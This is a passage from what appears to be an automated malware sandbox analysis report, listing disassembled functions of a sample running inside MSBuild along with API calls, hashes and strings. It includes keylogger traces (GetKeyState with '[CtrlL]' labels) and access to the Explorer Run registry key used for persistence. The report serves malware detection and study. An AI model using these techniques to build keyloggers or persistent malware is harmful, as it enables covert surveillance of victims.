                                                • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00448825
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorFreeHeapLast_free
                                                • String ID: `@$`@
                                                • API String ID: 1353095263-20545824
                                                • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: State
                                                • String ID: [CtrlL]$[CtrlR]
                                                • API String ID: 1649606143-2446555240
                                                • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
                                                • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteOpenValue
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                • API String ID: 2654517830-1051519024
                                                • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                • GetLastError.KERNEL32 ref: 0043FB02
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast
                                                • String ID:
                                                • API String ID: 1717984340-0
                                                • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759